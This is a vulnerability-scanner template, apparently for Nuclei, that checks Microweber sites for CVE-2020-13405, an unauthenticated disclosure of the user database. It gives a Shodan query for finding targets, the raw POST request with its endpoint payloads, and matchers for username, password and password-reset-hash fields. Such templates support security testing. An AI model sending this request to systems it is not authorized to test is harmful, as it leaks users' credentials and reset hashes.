48 lines
1.5 KiB
YAML
48 lines
1.5 KiB
YAML
id: CVE-2020-13405
|
|
|
|
info:
|
|
name: MicroWeber - Unauthenticated User Database Disclosure
|
|
author: ritikchaddha,amit-jd
|
|
severity: high
|
|
description: |
|
|
The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML.
|
|
reference:
|
|
- https://rhinosecuritylabs.com/research/microweber-database-disclosure/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-13405
|
|
- https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2020-13405
|
|
cwe-id: CWE-306
|
|
metadata:
|
|
shodan-query: http.html:"microweber"
|
|
verified: "true"
|
|
tags: cve,cve2020,microweber,unauth,disclosure
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /module/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
Referer: {{BaseURL}}admin/view:modules/load_module:users
|
|
|
|
module={{endpoint}}
|
|
|
|
payloads:
|
|
endpoint:
|
|
- "users/controller"
|
|
- "modules/users/controller"
|
|
- "/modules/users/controller"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body,"username")'
|
|
- 'contains(body,"password")'
|
|
- 'contains(body,"password_reset_hash")'
|
|
- 'status_code==200'
|
|
- 'contains(all_headers,"text/html")'
|
|
condition: and
|